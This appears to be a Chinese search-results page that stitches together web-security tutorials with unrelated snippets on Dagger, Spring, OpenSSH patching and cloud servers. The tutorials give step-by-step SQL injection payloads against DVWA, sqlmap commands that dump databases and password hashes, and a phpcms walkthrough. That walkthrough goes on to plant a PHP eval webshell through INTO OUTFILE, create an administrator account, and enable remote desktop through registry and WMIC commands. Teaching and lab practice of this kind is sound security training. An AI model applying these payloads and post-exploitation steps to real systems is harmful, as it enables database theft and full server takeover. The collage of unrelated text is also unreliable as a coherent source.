精华内容
下载资源
问答
  • SQL 注入是最常见、最被人们熟知的 web 漏洞。根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的...

    SQL 注入是最常见、最被人们熟知的 web 漏洞。根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

    比如某个公司有一个员工管理系统,里面存储员工的许多信息,每个员工只要输入自己的工号就可查询自己相关信息。张三是这个公司的一个开发人员,他突发好奇的想输入李四的工号10001是否可以成功查询,结果他失败了,因为系统有工号和身份的互相校验。于是他在工号后面加上了一个' OR 'a'='a,没想到成功返回了数据,他成功获取到了他人的许多敏感信息。

    这就是 SQL 注入攻击的典型场景,由于程序员在开发数据库中,没有对用户输入数据进行校验、转义、限制等处理,导致攻击者可以通过输入恶意字符串去获取数据库中的数据。先前的很多影视网站的 VIP 会员密码就是通过类似的方式泄漏的。

    今天我们测试对一个有 SQL 注入漏洞的网站进行攻击。因为类似的渗透测试过程在没有经过对方允许的情况下,是属于违法的!所以我们为大家准备了实验环境和靶机,你可以拿它当小白鼠,点击阅读原文即可体验。

    SQL 注入攻击步骤

    通常来说,SQL 注入攻击可以分为以下 5 个步骤:

    • 寻找注入点:指找到存在 SQL 注入的参数,SQL 注入大多发生在 GET 或 POST 请求的参数中,当然也有可能发生在其他地方,例如 UserAgent、Cookie 等

    • 判断注入类型 / 数据库类型:SQL 注入按照不同的分类标准,可以分成不同的种类。

      • 按照参数类型可分为两种:数字型和字符型。

      • 根据数据库返回的结果,可分为回显注入、报错注入、盲注。

      • 按照注入方法,还可以分为联合注入、堆叠注入、宽字节注入、延时注入等。

    • 猜解数据库名:猜解后台数据库的库名

    • 猜解数据表名:成功猜解到数据库名称后,进一步猜解某一个特定数据库中数据表的名称

    • 猜解数据字段名:最后是某个特定数据库中特定数据表中的字段,因为获取到字段才能查询数据

    使用SQL 注入进行爆库 

    我们先通过一个实验,让你更加清楚的理解 SQL 注入攻击的全过程,然后再针对「如何寻找注入点」和「如何判断注入类型」这两部分做详细的讲解。

    首先,在终端中执行如下命令快速部署实验环境:

    # 适用于 Ubuntu 20.04 4G VNC 环境
    curl 'https://labfile.oss.aliyuncs.com/courses/3471/3471-sql-init-1.sh' > ~/3471-sql-init-1.sh;chmod +x ~/3471-sql-init-1.sh;./3471-sql-init-1.sh
    
    
    

    然后打开桌面上的 Firefox 浏览器,访问以下网址 :

    http://localhost/dvwasql
    
    
    

    点击 create/Reset Database 创建数据库:

    稍微等待几秒后,会自动跳转到登录界面,默认用户名为 admin 密码为 password

    为了让我们更容易理解 SQL 注入的原理,所以先手动将 Security 级别调整为 low,注意需要点击 Submit 使设置生效:

    第一步:寻找注入点

    点击左侧的 SQL injection 页面开始注入:

    先输入 1 ,查看回显 (URL 中 ID=1,说明 php 页面通过 get 方法传递参数):

    那实际上后台执行了什么样的 SQL 语句呢?点击 view source 查看源代码:

    可以看到,实际执行的 SQL 语句是:

    SELECT first_name, last_name FROM users WHERE user_id = '1';
    
    
    

    在参数 id 后面加一个单引号试试:

    可以看到,返回了数据库报错信息,说明此处存在 SQL 注入漏洞。

    至于为什么能判断存在 SQL 注入,后文会细讲。

    第二步:确定注入类型

    我们使用最简单的「联合查询注入」来进行演示。

    联合查询的语法如下:

    SELECT column_name(s) FROM table1
    UNION
    SELECT column_name(s) FROM table2;
    
    
    

    union 运算符可以将两个或两个以上 select 语句的查询结果集合合并成一个结果集合显示,即执行联合查询。

    但当使用 union select 的时候,需要保证前后查询的列数相同,例如:

    SELECT A, B FROM users WHERE user_id = '1' union select C, D;
    
    
    

    Union 前半部分查询了 A、B 两个字段,Union 后半部分也只能查询 C、D 两个字段,否则就会报错。

    但现在有一个问题:我们还不知道 Union 的前半部分查询的字段数是多少?

    这个时候就需要用到 order by 来查询字段数了。在输入框中输入 1' order by 1#,实际执行的 SQL 语句就会变成:

    SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#`;
    # 按照 MySQL 语法,# 后面会被注释掉,使用这种方法屏蔽掉后面的单引号,避免语法错误
    
    
    

    这条语句的意思是查询 users 表中 user_id 为 1 的数据并按第一字段排行。

    输入 1' order by 1# 和 1' order by 2# 时都返回正常:

    当输入 1' order by 3# 时,返回错误:

    由此可知,users 表中只有两个字段,数据为两列。

    知道字段数为 2 之后,接下来就可以使用 union select 联合查询继续获取信息。

    输入以下进行查询:

    1' union select version(),@@version_compile_os#
    
    
    
    • version() 获取当前数据库版本.

    • @@version_compile_os 获取当前操作系统。

    实际执行的 SQL 语句是:

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select version(),@@version_compile_os#`;
    
    
    

    通过上图返回信息,我们又成功获取到:

    • 当前数据库版本为 : 10.5.8-MariaDB-1:10.5.8+maria~focal

    • 当前操作系统为 : debian-linux-gnu

    第三步:查询数据库名

    查询数据库名的方法非常简单,只需要执行以下语句进行查询即可 :

    1' union select database(),user()#
    
    
    
    • database() 将会返回当前网站所使用的数据库名字.

    • user() 将会返回执行当前查询的用户名.

    实际执行的 SQL 语句是 :

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select database(),user()#`;
    
    
    

    通过上图返回信息,我们成功获取到:

    • 当前网站使用数据库为 dvwa

    • 当前执行查询用户名为 root@localhost

    第四步:查询数据库表名

    接下来我们尝试获取 dvwa 数据库中的表名。

    information_schema 是 mySQL 自带的一张表,这张数据表保存了 MySQL 服务器所有数据库的信息,如数据库名,数据库的表,表栏的数据类型与访问权限等。该数据库拥有一个名为 tables 的数据表,该表包含两个字段 table_name 和 table_schema,分别记录 DBMS 中的存储的表名和表名所在的数据库。

    我们输入以下语句进行查询:

    1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#
    
    
    

    实际执行的 SQL 语句是:

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select table_name,table_schema from information_schema.tables where table_schema= 'dvwa'#`;
    
    
    

    通过上图返回信息,我们可以知道以下信息:

    • dvwa 数据库有 2 个数据表

    • 表名为 guestbook 和 users

    第五步:猜解数据库字段名及爆库

    接下来我们继续猜解数据库表中的字段名,因为需要知道字段名,才能查询数据库中存储的数据。

    我们输入以下语句查询 users 表中的字段信息:

    1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
    
    
    

    从输出结果可知,users 表中有 8 个字段,分别是 user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

    直接告诉我们,这些字段中最敏感的是 user,password 这两个字段,所以输入:1' union select user,password from users#进行查询。

    实际执行的 SQL 语句是:

    SELECT first_name, last_name FROM users WHERE user_id = '1' union select user,password from users#`;
    
    
    

    可以看到成功爆出用户名、密码,密码采用 md5 进行加密,可以到 https://www.cmd5.com/ 查询解密:

    总结

    通过实战的演练,相信大家已经理解了通过 SQL 注入来爆破数据库的方法和流程,最后我们再梳理一下比较重要的知识点:

    • SQL 注入产生的原因

    • SQL 注入攻击的分类

    • SQL 注入爆库攻击的 5 个步骤

    上面的内容来自蓝桥云课《Web 漏洞实战:从入门到精通》课程,课程为大家提供了配套的实验环境和靶机,省去本地搭建环境和因法律问题而无法练习的苦恼。

    除了 SQL 注入攻击,课程还详细介绍了 文件包含漏洞、 跨站脚本 (XSS) 漏洞、文件上传漏洞、命令注入漏洞、代码注入漏洞、目录遍历漏洞 的原理、技巧和实战流程,非常适合以下人群:

    • 初级渗透测试工程师

    • 初级安全服务工程师

    • 对 Web 安全领域感兴趣的新手朋友

    • 就读于《信息安全》专业的学生

    课程地址:

    https://www.lanqiao.cn/courses/3471

    课程大纲:

    课程展示

    • 针对每一个 Web 漏洞,课程会从代码层面讲解漏洞产生的原因,帮助你更好的理解漏洞的本质:

    • 每个章节均搭配完全在线的实战实验环境,省去自己本地搭建实验环境的烦恼:

    • 每章节均包含详细的实验步骤,手把手带你完成实验:

    • 还会讲解漏洞利用遇到限制时的绕过方法,满满的成就感:

    课程地址:

    https://www.lanqiao.cn/courses/3471

    ???????????? 点击文末的「阅读原文」,免费试学课程内容~

    展开全文
  • SQL注入系列教程(6套),百度链接可用,友情分享。
  • SQLMAP注入测试基础教程

    千次阅读 2018-02-24 09:26:13
    (1)注入参数id为GET注入注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。 (2)web服务器系统为windows 2003 or XP (3)web应用程序技术为:ASP.NET, Microsoft IIS ...

    文章转载自:http://blog.csdn.net/zgyulongfei/article/details/41017493

    本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。

    >

    >

    对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

    sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。


    既然本文是基础教程,以下只写工具的基本使用方法。

    本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。


    测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

    注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。


    教程开始:

    一、检测注入点是否可用

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"  
    参数:

    -u:指定注入点url

    结果:



    注入结果展示:

    (1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

    (2)web服务器系统为windows 2003 or XP

    (3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

    (4)数据库类型为:SQLSERVER 2000


    其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch  

    二、暴库

    一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs  

    参数:

    --dbs:dbs前面有两条杠,请看清楚。

    结果:


    结果显示该sqlserver中共包含7个可用的数据库。


    三、web当前使用的数据库

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db  


    四、web数据库使用账户

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user  



    五、列出sqlserver所有用户

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users  


    六、数据库账户与密码

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords  


    七、列出数据库中的表

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables  
    参数:

    -D:指定数据库名称

    --tables:列出表

    结果:



    结果体现共列出了34张表。


    八、列出表中字段

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns  

    参数:

    -D:指定数据库名称

    -T:指定要列出字段的表

    --columns:指定列出字段

    结果:


    结果显示该userb表中包含了23条字段。


    九、暴字段内容

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump  
    参数:

    -C :指定要暴的字段

    --dump:将结果导出

    结果:


    如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

    [plain]  view plain  copy
    1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump  
    参数:

    --start:指定开始的行

    --stop:指定结束的行

    此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

    结果如下:




    十、验证结果

    通过上图结果看到其中的一个用户信息为:

    email:123456@qq.com

    username: 1.asp

    password: 49ba59abbe56e057

    通过md5解密,得到该hash的原文密码为:123456


    拿到账号密码我们来测试是否可以登录,登录结果如下:


    验证成功!

    展开全文
  • 【sql注入教程】SQL注入是什么?我们如何去玩转它 本文转自:i春秋社区 SQL注入攻击是黑客攻击数据库最常见手段之一。简单讲,SQL注入攻击是黑客利用网站程序漏洞,通过提交精心构造的SQL语句,以达到窃取...

    【sql注入教程】SQL注入是什么?我们如何去玩转它

    本文转自:i春秋社区
     

     
    SQL注入攻击是黑客攻击数据库最常见手段之一。简单讲,SQL注入攻击是黑客利用网站程序漏洞,通过提交精心构造的SQL语句,以达到窃取数据库信息、修改破坏数据库为目的的攻击行为。SQL注入攻击方式非常隐蔽,不容易被察
     
    觉,攻击成功所导致的后果严重,所以对网络安全危害巨大,对自己的网站都会造成不必要的损失,因此如何防范SQL注入攻击是很值得学习的,
     
     
    很多人声称自己了解sql注入 但是他们听说经理的情况比较常见 sql注入是影响企业运营最具有破坏性的漏洞之一 他会泄露保存在应用程序数据库中的敏感信息, 包括用户名 ,口令,电话号码,以及银行卡明细等被利用的信息。
     
     
     
    下面我截图了一张乌云漏洞平台 不完整的最新确认的漏洞 大家可以看看sql注入 占据近一半之多


     

    那么SQL是如何造成的让我们一起探讨下如何玩转sql注入
     

    转载于:https://www.cnblogs.com/ichunqiu/p/5857028.html

    展开全文
  • phpcms手工注入教程

    2018-10-24 11:25:55
    攻击机器:利用镜像win2k8创建主机,并作为攻击机 步骤: 一、靶机操作 1、进入靶机,查看IP地址; 开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig 显示,靶机配置信息,记下以太网适配器下,IPv4地址...

    目标服务器(靶机):192.168.1.27
    目标网站:http://192.168.1.27:8083
    步骤:

    一、靶机操作

    1、进入靶机,查看IP地址;

    开始—运行,输入cmd回车,出现命令行窗口,输入:ipconfig
    显示,靶机配置信息,记下以太网适配器下,IPv4地址(后面访问网页会用到)。
    此处为192.168.1.27

    2、启动phpstudy(桌面图标):

    在这里插入图片描述
    如果,显示不是两个绿色标志,则等待一会,按下重启按钮,再次尝试。

    二、远程攻击机操作

    1、打开攻击机

    利用攻击机,访问靶机。http://192.168.1.27:8083(注意根据查看到的靶机IP地址,修改此处的IP,端口不变,以下截图中,均应将端口修改为8083),然后点击其中的一篇文章,如果地址栏出现http://***/xx.php?id=XX,则表明目标网站,采用PHP语言开发。
    在这里插入图片描述

    2、试探目标网站

    分别在地址末尾添加单撇号、and 1=1 和 and 1=2 进行注入点探测。
    在这里插入图片描述
    如果单撇号出错、给出数据库信息,and 1=1正确执行,and 1=2显示空页面,则表明存在注入攻击点。

    在这里插入图片描述
    在这里插入图片描述

    三、手工注入

    非常重要:首先在网站找到管理入口,否则,呵呵就算有用户名和密码,没有入口,也是白玩。。

    注入时,注意通过改变大小写、编码、转换等方式躲过系统检查,顺利执行语句!!!

    步骤1:访问目标网站

    在这里插入图片描述
    随便点击其中一个新闻
    在这里插入图片描述

    步骤2:寻找注入点

    在 URL 后加’(单引号)判断是否存在注入点,数据库报错。
    在这里插入图片描述

    步骤3:判断字段长度:

    利用 order by N,从数字 1 开始替代 N,直到返回错误页面,判断字段长度为错误页面的 N-1,也就是最后一个正常页面返回。实验中N=16,错误,所以字段长度为15
    在这里插入图片描述
    在这里插入图片描述

    步骤4:判断字段位置回显:

    利用 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 最后一个数为字段长度,有回显会将相应数字显示出来。从下图可知,3 和 11 的位置可以回显信息。判断数据库信息:
    在这里插入图片描述

    步骤5:判断数据库信息:

    利用 and 1=2 union select 1,2,sql_command,4,5,6,7,8,9,10,11,12,13,14,15 ,用 sql 指令替换 sql_command。
    Sql_command为以下参数:
    查看 mysql 版本 version()
    查看当前数据库 database()
    查看当前用户 user()

    1. 判断版本
      在这里插入图片描述

    2. 判断数据库
      在这里插入图片描述

    3. 判断用户
      在这里插入图片描述

    步骤6:判断mysql所有数据库:

    利用 and 1=2 union select 1,2,group_concat(convert(SCHEMA_NAME using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.SCHEMATA,查看 mysql中所有数据库的名称。
    由下图结果可知业务数据库为 cms。其他数据库有mysql,discuz,test等
    在这里插入图片描述

    步骤7:判断数据库表:

    利用 and 1=2 union select 1,2,group_concat(convert(table_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database() ,查看 cms 数据库拥有的所有表。可以发现存放用户信息的表cms_users。=
    在这里插入图片描述

    步骤8:判断数据表的所有列:

    利用 and 1=2 union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_name=0x636D735F7573657273。
    table_name=cms_users,表名需要编码为 16 进制。得到 3 个列:userid,username 和 password
    从ASCII对照表中可知对应:c(63) m(6d) s(73) _(5f) u(75) s(73) e(65) r(72) s(73)
    在这里插入图片描述

    步骤9:判断管理员账号密码:

    利用 and 1=2 union select 1,2,concat_ws(0x2b,userid,username,password),4,5,6,7,8,9,10,11,12,13,14,15 from cms.cms_users。得到管理员账号密码为:admin/e10adc3949ba59abbe56e057f20f883e(解密后123456)
    在这里插入图片描述
    登陆后台地址后台地址:http://192.168.1.27:8083/admin/login.php,SQL注入结束。
    在这里插入图片描述

    四、利用Havij进行自动化工具注入

    在桌面,运行Havij.exe。

    在这里插入图片描述
    在Target后面的输入栏中,输入看到的目标网站的可注入网址。

    注意:
    (1)Target栏目中,输入内容,必须带上“http://”,并且,一定具有****.php?id=**特征。
    (2)Database选择项,根据前面出错信息,自动检测。其他按图中所示进行选择即可。
    (3)点击,Analyze,即可输出各种信息。

    第一步:获取信息。点击info,查看基本信息。

    在这里插入图片描述

    第二步:获取数据库,表,列的信息。

    依次点击TablesàGetDBs,得到靶机上的所有数据库信息(如果仅显示一个数据库,等待1分钟左右,再次点击即可),勾选mysql数据库,然后点击Get Tables,得到mysql数据库中的所有表的信息。

    选择user、password列,点击Get Data得到当前数据库的用户名和密码加密后的值。

    在这里插入图片描述
    通过www.cmd5.com查询,得到对应的密码明文。
    Root

    第三步:登陆数据库

    利用拿到的mysql数据库用户名密码登录数据库管理端。(此处省去发现该端口过程,可利用指纹扫描软件发现PHPmyadmin的管理端口)
    访问http://192.168.1.27:8088/phpMyAdmin/,输入用户名密码,进入如下界面:
    在这里插入图片描述
    在数据库列表中,选中cms数据库。然后,在网页中部偏上位置,点击SQL,并执行SQL命令。
    select ‘<?php eval($_POST[cmd]);?>’ into outfile ‘D:/WWW/cms/ma.php’
    注意:此处如果将/写为\将不能执行。

    在这里插入图片描述

    此处,写入的目录,需要不断进行试探。。
    网站根目录下面才是cms网站,所以此目录,对应的网址为:
    http://192.168.1.27:8083/ma.php,利用菜刀连接此地址。
    中国菜刀连接后,打开命令行界面:
    输入http://192.168.1.27:8083/ma.php 口令为cmd。
    在这里插入图片描述
    然后右键点击添加条目,选择文件管理,即可看到目标靶机的磁盘情况。

    在这里插入图片描述
    即可下载、上传、删除文件等。

    如果需要进行用户操作,则右键点击添加条目,选择虚拟终端,弹出类似DOS窗口的webshell。此窗口中可进行用户添加与权限提升。
    在这里插入图片描述
    打开虚拟终端后,执行net user,如果菜刀显示乱码,设置编码方式为GB2312即可。
    在这里插入图片描述

    以下操作,除非特殊说明,均在此webshell中进行。

    五、命令

    查看当前存在用户:
    net user
    查看当前用户组:
    net localgroup
    添加用户(以添加用户名username密码1234为例):
    net user username 1234 /add
    添加用户到组(以添加ls用户到Administrators组为例):
    net localgroup Administrators username /add
    查看用户组:
    net localgroup administrators
    即可看到所添加的用户,已经在管理员组了。

    为了便于操作,还可以开启远程桌面开启。
    如果,远程主机关闭了远程桌面功能,则有几种方法打开:在WEbshell窗口中,执行以下任一语句,即可远程打开远程桌面功能。

    (1)REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    (2)wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1

    (3)wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName =’RDP-Tcp’) call setuserauthenticationrequired 1
    以上三种方法,第一种用于xp和win2003,后两者适用与win7、8.

    然后,然后,打开远程桌面,输入目标网站IP地址。

    利用刚才创建的用户名、密码登录了。
    可以查看文件,可以修改配置。
    下载文件,还要在菜刀中进行。

    本教程仅供网站进行渗透测试,请勿用于非法途径!!造成任何危害,均由个人负全责!!

    展开全文
  • XSS跨站攻击介绍,解释XSS是如何进行攻击的以及执行攻击的实例
  • 说明:DedeCMS V5.7 SP2正式版(2018-01-09) dedecms的/dedecms/member/album_add.php文件中,对输入参数mtypesid未进行int整型转义,导致SQL注入的发生 修改方法 1 打开 /member/album_add.php 找到 大概在221行 //...
  • 依赖注入这个模式(模式已经用烂了,这里再烂一次)是用来给应用的各部分解耦的。...本教程会使用最新的Dagger2(当前的版本是2.2)。这里是官网。你可以在这里找到最新的发布。AndroidStudio是必须的。
  • PHP100视频教程53:PHP如何防止注入及开发安全 PHP100视频教程54:Apache Rewrite 拟静态配置 PHP100视频教程55:PHP5中使用PDO连接数据库 PHP100视频教程56:制作PHP安装程序的原理和步骤 PHP100视频教程57:...
  • c# 依赖注入 控制反转

    2017-08-14 15:24:53
    控制反转 依赖注入的c#实现,很好的教程
  • 而在所有服务器商家中,阿里服务器无疑是最受用户喜爱的,在购买过程中很多新手用户在地域、实例规格、操作系统、带宽等很多方面还不是很清楚如何选择,下面就介绍下新手用户的阿里购买服务器流程及注意事项...
  • 手工简单识别可以判断该网址是否存在SQL注入漏洞,如果没有报错,就是有注入漏洞 sqlmap工具可以识别的这些SQL注入漏洞 sqlmap -m filename (filename中保存检测目标) sqlmap --crawl (sqlmap对目标网站进行爬取...
  • 准备跟着网易课堂的Spring教程先过一遍Spring框架的基础知识。 综合知识点: Spring框架特性:轻量级、开源、一站式 aop:面向切面编程,即扩展功能不是修改源代码实现。 ioc :控制反转,不通过new来创建对象,...
  • OpenSSH 命令注入漏洞(CVE-2020-15778)修复教程

    千次阅读 热门讨论 2021-05-30 11:27:35
    OpenSSH 命令注入漏洞(CVE-2020-15778) OpenSSH 安全漏洞(CVE-2021-28041) 一般线上用的主机的ssh版本都还比较低;线上的主机版本还处于OpenSSH_7.4p1。2021年来,主机进行了漏洞扫描,出现了大量openssh的...
  • xpath 注入工具和视频教程
  • sqlmap注入

    2018-12-25 12:11:39
    sqlmap注入教程合辑,百度链接长期有效。
  • Sqlmap2021 -- Cookie注入

    2021-07-07 14:39:07
    ---- 网易热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 ...
  • ASP.NET Core ASP.NET 4.x 框架选择 ASP.NET CORE ASP.NET 4.X 针对 Windows、macOS 或 Linux ...内置依赖项注入。 轻型的高性能模块化 HTTP 请求管道。 能够托管于以下各项: 并行版本控制。 简化新式 Web 开发的工具
  • Sqlmap2021 -- Referer注入

    2021-07-07 14:40:28
    ---- 网易热评 一、检测是否存在注入 1、通过BurpSuite抓包,将封包内容保存到referer.txt POST /sqli/Less-19/ HTTP/1.1 Host: 192.168.139.129 Content-Length: 38 Cache-Control: max-age=0 Upgrade-...
  • 平时常见的攻击网站手法比如 SQL 注入、XSS 跨站脚本等,还有常见 Web 服务器插件漏洞被利用、上传木马、攻击非授权核心资源访问等,web 应用防火墙都能够一一抵挡住。今天魏艾斯博客也是刚接触阿里 Web 应用...
  • 阿里轻量应用服务器是给新手开发的服务器类型,带有引导页面即使新手也能根据引导提示轻松建站。本文分享在这个服务器上如何绑定和解析域名。 更多参阅官方文档 登录轻量应用服务器控制台,在 服务器列表 中点击...
  • 为了缩短下载依赖所需的时间, 我们通常会考虑使用访问更迅速的镜像仓库, 例如阿里的 Maven 镜像. 在打开下载下来的仓库之前, 找到根目录的 build.gradle 文件, 并向其中添加如下配置 repositories { maven { url ...
  • 而在所有服务器商家中,阿里服务器无疑是最受用户喜爱的,在购买过程中很多新手用户在地域、实例规格、操作系统、带宽等很多方面还不是很清楚如何选择,下面就介绍下新手用户的阿里购买服务器流程及注意事项...
  • \n请把被注入的DLL文件放在本程序所在目录下。" , "错误" , MessageBoxButton . OK , MessageBoxImage . Error ) ; return ; } //默认选择第一项 if ( this . cb_dllLists . SelectedIndex == ...
  • 云盾Web应用防火墙(Web Application Firewall, 简称 WAF)基于安全大数据能力实现,通过防御SQL注入、XSS跨站脚本、常见Web服务器插件漏洞、木马上传、非授权核心资源访问等OWASP常见攻击,过滤海量恶意CC攻击,...
  • 主要包括网络攻防实验环境虚拟机搭建、网络协议分析、网络信息收集(信息扫描)、网络设备加固、网络探测技术及分析防御方法、Windows攻击技术...、无线网络和移动终端平台安全威胁、暴力破解、SQL注入方法等实战教程...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 5,627
精华内容 2,250
关键字:

云注入教程